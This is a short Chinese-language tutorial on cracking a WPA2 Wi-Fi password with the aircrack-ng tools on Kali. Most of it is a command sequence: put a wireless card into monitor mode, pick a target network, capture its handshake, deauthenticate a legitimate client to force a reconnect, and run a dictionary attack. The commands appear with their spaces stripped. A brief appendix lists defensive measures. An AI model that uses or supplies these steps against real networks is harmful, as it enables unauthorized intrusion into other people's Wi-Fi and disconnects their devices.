WPA2密码破解方法

无线路由器WPA2加密破解方法1、启动KALI系统，并将无线网卡接入到KALI虚拟机中。判断wlan无线网卡是否存在，此时无线网卡名称为wlan0命令：ifconfig-a2、为攻击做准备，停止部分服务命令：airmon-ngcheckkill3、将无线网卡转为监控模式此时无线网卡名称从wlan0切换为wlan0mon命令：airmon-ngstartwlan04、扫描附近无线网络，寻找需要攻击的目标确认要攻击目标的bssid和ch命令：airodump-ngwlan0mon5、开始抓握手包命令：airodump-ng-c1–bssidC8:3A:35:18:FB:88-wpojiewlan0mon参数-c要破解AP所在频道--bssid要破解AP的MAC地址-w抓取包保存的文件名注意：最后一行信息的BSSID是AP的MAC地址，STATION是合法已经登录的客户端的MAC地址，下一步要将攻击该客户端，使其重新登录6、保持当前终端窗口继续进行，打开一个新的终端，对合法的客户端进行攻击，使其下线后重新登录，从而抓握手包。命令：aireplay-ng–deauth1-aC8:3A:35:18:FB:88-c01:AF:72:44:B1:ABwlan0mon命令操作成功后，抓包窗口右上角会提示获取了握手数据包7、利用抓取的数据猜解密码命令：aircrack-ng-w/dict/wordlistpojie-01.cap参数：/dict/wordlist密码字典，真实环境下可以用数亿条数据，测试时用我们可以自建密码字典Pojie-01.cap是抓取的数据包，每次重新抓取后面的数值自增一个，变为0203….附录：制作密码字典#mkdir/dict#echo12345678/dict/wordlist#echo123456789/dict/wordlist#echo1234567890/dict/wordlist附录：防止WPA2密码被破解的方法1、wifi密码设得足够复杂，最少要设得10位以上，字母与数字混合。2、关闭ssid广播功能，避免被扫描到3、开启MAC地址白名单，将允许访问的客户端的地址加入到无线路由器的白名单中。